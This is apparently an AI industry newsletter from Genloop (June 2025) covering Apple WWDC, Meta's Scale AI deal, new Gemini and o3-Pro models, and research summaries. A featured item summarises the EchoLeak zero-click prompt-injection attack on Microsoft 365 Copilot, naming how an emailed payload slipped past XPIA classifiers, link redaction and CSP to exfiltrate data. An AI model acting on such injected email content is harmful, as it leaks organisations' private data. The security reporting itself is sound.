Jun 20, 2025
Dear Readers,
Welcome to the 12th edition of Fine-Tuned by Genloop! This edition highlights Apple WWDC key highlights where AI was not a highlight :), Meta's significant efforts towards building superintelligence by investing in Scale AI, and new model releases by Google and OpenAI.
We also share our insights on one of Apple's research papers - "The Illusion of Thinking". We will be covering more on it in our upcoming Research Jam.
So, let's dive in!
🌟 AI Industry Highlights
Apple's AI-Less WWDC 2025
Apple's WWDC 2025 focused primarily on liquid glass UI, with minimal AI-related announcements, while other tech giants continue making major advances in artificial intelligence. Here are the AI features that were announced, though their release dates remain unspecified.
Key AI Highlights:
Live Translation: Real-time translation in Messages, FaceTime, and Phone calls running entirely on-device
Enhanced Visual Intelligence: Screen-aware AI can search and take action on anything displayed across iPhone apps
Workout Buddy on Apple Watch: AI-powered fitness coaching with personalized insights during workouts
Expanded Creative Tools: Updated Genmoji and Image Playground with ChatGPT integration for new styles
Intelligent Shortcuts: Direct integration with Apple Intelligence models for automated workflows
Developer Tools Enhancement: Apple integrates ChatGPT into Xcode 26 for intelligent coding and provides direct access to on-device Foundation Models framework.
Given Apple's vast resources, these updates fell short of expectations. With ongoing leadership changes, we hope next year's WWDC will help Apple regain its competitive edge in the AI race.

Meta Invests $14.3 Billion in Scale AI, Hires CEO for AI Development
Meta has confirmed a "significant" investment in data-labeling company Scale AI, reportedly $14.3 billion for a 49% stake, while hiring CEO Alexandr Wang to lead Meta's superintelligence efforts.
Key highlights:
Strategic Partnership: Meta's investment values Scale AI at $29 billion, with Wang joining Meta to enhance their AI model development while remaining as board director at Scale AI
Open Weight Boost: The move could significantly strengthen Meta's Llama series and open-weight model capabilities, as Scale AI specializes in producing high-quality training data for leading AI labs (OpenAI is cutting ties with Scale AI following this deal)
The acquisition is aimed to address Meta's talent retention challenges and competitive positioning against Google, OpenAI, and Anthropic. We hope this helps accelerate open-source AI development through improved Llama models.
Google Expands Gemini 2.5 Family with General Availability and New Flash-Lite Model
Google has released stable versions of Gemini 2.5 Flash and Pro for production use, while introducing Gemini 2.5 Flash-Lite as their fastest and most cost-efficient model in the 2.5 series.
Key highlights:
Production Ready: Gemini 2.5 Flash and Pro are now generally available with stable versions for enterprise deployment.
Flash-Lite Preview: The new Flash-Lite model offers higher quality than 2.0 Flash-Lite across coding, math, science, and reasoning benchmarks while delivering lower latency for high-volume tasks
The models are accessible through Google AI Studio, Vertex AI, and the Gemini app, with custom versions integrated into Google Search.
OpenAI Launches o3-Pro
OpenAI released o3-Pro, its most reliable reasoning model designed to think longer and provide most reliable responses
Key highlights:
Enhanced Reliability: Uses "4/4 reliability" recommended to be used for challenging questions where reliability matters more than speed
Full Tool Access: Includes web search, file analysis, visual reasoning, Python execution, and memory capabilities, though responses take significantly longer than previous models
✨ Genloop Updates
Genloop Joins Meta's First Llama Startup Program!
We are proud to announce that we are part of the first cohort of AI at Meta's Llama Startup Program! 🦙 x ♾️
We look forward to exploring innovative possibilities with Llama team as we work to make GenAI more domain-intelligent and production-ready.

Research Jam #6: Training Retrievers for Reasoning Tasks
Last week, we had Research Jam 6 on the Qwen3 Technical Report, where we covered some fascinating ground, including Qwen3's dual personality modes, strong benchmark performance across model sizes, and the advanced distillation pipeline for knowledge transfer.
The engaging discussion on thinking budgets and reasoning capabilities was really insightful.
If you'd like to revisit our discussion or couldn't make it this time, check out the session recording here:
Join Research Jam #7: Deep dive into Apple’s paper - Illusion of Thinking
Research Jam #7 is happening on June 26th, where we'll dive into Apple's The Illusion of Thinking - the top research paper on LLM Research Hub for the week of June 2nd, 2025.
Spots are limited, so register today to secure your place!

📚 Featured Blog Post
We've got a fascinating read that explores a critical security discovery that highlights emerging AI vulnerabilities:
Microsoft 365 Copilot Hit by "EchoLeak" Zero-Click AI Vulnerability
Security researchers at Aim Labs discovered "EchoLeak," a critical zero-click vulnerability in Microsoft 365 Copilot that allows attackers to automatically exfiltrate sensitive data without user interaction.
Key highlights:
Zero-Click Attack: Attackers only need to send an email to victims, exploiting "LLM Scope Violation" where untrusted inputs access privileged organizational data through the AI system
Multiple Bypass Techniques: The attack chain circumvents Microsoft's XPIA classifiers, link redaction, and Content Security Policy protections using reference-style markdown and SharePoint/Teams URLs
Broad Data Access: Can exfiltrate any information in Copilot's context including chat history, Microsoft Graph resources, and organizational data across email, OneDrive, and Teams
The vulnerability exploits fundamental design flaws in RAG-based AI systems and represents the first zero-click exploit found in a major AI application that requires no specific user behavior.

🔬 Research Corner
Check out our latest Top 3 Papers of the Week [June 9 - June 13, 2025]. Each week, our AI agents score the internet for the best research papers, evaluate their relevance, and our experts carefully curate the top selections. Don't forget to follow us to stay up to date with our weekly research curation!

Now, let's deep dive into the top research from the last two weeks:
Scaling Test-Time Interaction for Agents: Thinking vs. Doing
Carnegie Mellon University, University of Illinois, University of Toronto, UC Berkeley, and NYU present research exploring a new dimension of test-time scaling for interactive agents by prioritizing interaction steps over reasoning tokens.
Key findings:
Interaction Over Reasoning: Scaling interaction steps outperforms scaling per-step reasoning under fixed compute budgets, achieving higher task success rates than existing methods
Curriculum-Based Training: TTI uses curriculum learning to gradually increase interaction horizons, preventing overfitting while avoiding training instability
Strong Web Performance: Gemma 3 12B with TTI achieves 64.8% on WebVoyager and 26.1% on WebArena—highest among open-source agents on synthetic data
The research demonstrates that interaction scaling provides a complementary dimension to existing test-time compute methods, enabling adaptive exploration and backtracking during task execution.
Read Our TuesdayPaperThoughts analysis

The Illusion of Thinking: Examining Large Reasoning Model Limits
Apple Research investigates the thinking capabilities of Large Reasoning Models using controllable puzzle environments to systematically analyze reasoning traces and performance patterns across complexity levels.
Key findings:
Three Performance Regimes: Standard LLMs outperform LRMs at low complexity; LRMs show advantages at medium complexity; both collapse at high complexity with zero accuracy
Overthinking Phenomenon: LRMs often identify correct solutions early but continue reasoning and choose incorrect alternatives, with counterintuitive reduction in reasoning tokens near critical thresholds
Execution Limitations: Even with explicit step-by-step algorithms, LRMs show no improvement and fail at similar complexity points, revealing fundamental logical execution constraints
The research demonstrates that analyzing reasoning traces beyond answer-only benchmarks reveals architectural limitations that sophisticated self-reflection mechanisms cannot overcome.
Read Our TuesdayPaperThoughts analysis

Looking Forward
As we witness significant efforts by tech giants like Meta to acquire top AI talent and compete aggressively, we also see companies like Apple perhaps taking a more measured approach. With this rapid pace of development, discovering new vulnerabilities like "EchoLeak" becomes crucial for ensuring the security of organizational data in AI systems.
Looking ahead, we're gaining deeper insights into how these LLMs actually "think" through fascinating research, and we're excited about the future we're heading towards.
If you're exploring how to leverage these advances for your specific use case, we'd love to hear from you.
About Genloop
Genloop empowers enterprises to deploy GenAI in production with agents that understand business know-how and processes. We help companies build personalized LLMs that deliver superior performance, control, and simplicity—ideal for use cases like chatting with enterprise databases and transforming click-based workflows into conversational interfaces. Visit genloop.ai, follow us on LinkedIn, or reach out at founder@genloop.ai to learn more.